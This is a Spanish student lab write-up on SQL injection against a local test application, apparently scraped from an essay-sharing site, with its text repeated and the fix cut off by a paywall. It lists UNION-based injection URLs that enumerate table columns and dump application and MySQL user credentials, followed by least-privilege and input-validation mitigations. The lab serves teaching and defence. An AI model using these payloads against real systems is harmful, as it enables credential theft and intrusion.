Sql Injection
Páginas: 2 (289 palabras)
Publicado: 30 de mayo de 2012
Práctica de SQL Injection
1. Obtener el login y password de todos los usuarios de la aplicación.
Obtener columnas de la tabla 'productos'http://localhost/SQL_injection/ver.php?id=-1 union select 1,2,column_name,4,5 from information_schema.columns where table_name = 'productos'
-
Obtener columnas de la tabla 'usuarios'http://localhost/SQL_injection/ver.php?id=-1 union select 1,2,column_name,4,5 from information_schema.columns where table_name = 'usuarios'
-
Obtener login y password de todoshttp://localhost/SQL_injection/ver.php?id=-1 union select 1,2,user,password,5 from usuarios
2. Obtener el login y password de todos los usuarios de MySQL.
Se puedeobtener el usuario y clave de los usuarios de MySQL con la siguiente inyección SQL:
http://localhost/SQL_injection/ver.php?id=-1 union select 1,2,user,password,5 from mysql.user3. Crear un usuario específico para el acceso a la base de datos de la aplicación.
Se debe crear un usuario para la base de datos de la aplicación con los privilegiosmínimos, como esta aplicación es muy sencilla y solo permite listar los productos se ha creado el usuario con tan solo el permiso SELECT. Ahora se podría seguir haciendo lasinyecciones SQL para mostrar los usuarios y claves de la aplicación pero no se podría listar los de MySQL porque el usuario que hemos creado no puede acceder a la base dedatos MySQL
4. Modificar la aplicación para prevenir cualquier ataque de inyección SQL.
Para evitar las inyecciones de SQL tenemos que validar los parámetros que llegan ala página, como en este caso solo necesitamos el id de un producto basta con forzar que el parámetro recibido sea un entero. El fichero quedaría de la siguiente forma:
1. Obtener el login y password de todos los usuarios de la aplicación.
Obtener columnas de la tabla 'productos'http://localhost/SQL_injection/ver.php?id=-1 union select 1,2,column_name,4,5 from information_schema.columns where table_name = 'productos'
-
Obtener columnas de la tabla 'usuarios'http://localhost/SQL_injection/ver.php?id=-1 union select 1,2,column_name,4,5 from information_schema.columns where table_name = 'usuarios'
-
Obtener login y password de todoshttp://localhost/SQL_injection/ver.php?id=-1 union select 1,2,user,password,5 from usuarios
2. Obtener el login y password de todos los usuarios de MySQL.
Se puedeobtener el usuario y clave de los usuarios de MySQL con la siguiente inyección SQL:
http://localhost/SQL_injection/ver.php?id=-1 union select 1,2,user,password,5 from mysql.user3. Crear un usuario específico para el acceso a la base de datos de la aplicación.
Se debe crear un usuario para la base de datos de la aplicación con los privilegiosmínimos, como esta aplicación es muy sencilla y solo permite listar los productos se ha creado el usuario con tan solo el permiso SELECT. Ahora se podría seguir haciendo lasinyecciones SQL para mostrar los usuarios y claves de la aplicación pero no se podría listar los de MySQL porque el usuario que hemos creado no puede acceder a la base dedatos MySQL
4. Modificar la aplicación para prevenir cualquier ataque de inyección SQL.
Para evitar las inyecciones de SQL tenemos que validar los parámetros que llegan ala página, como en este caso solo necesitamos el id de un producto basta con forzar que el parámetro recibido sea un entero. El fichero quedaría de la siguiente forma:
Leer documento completo
Regístrate para leer el documento completo.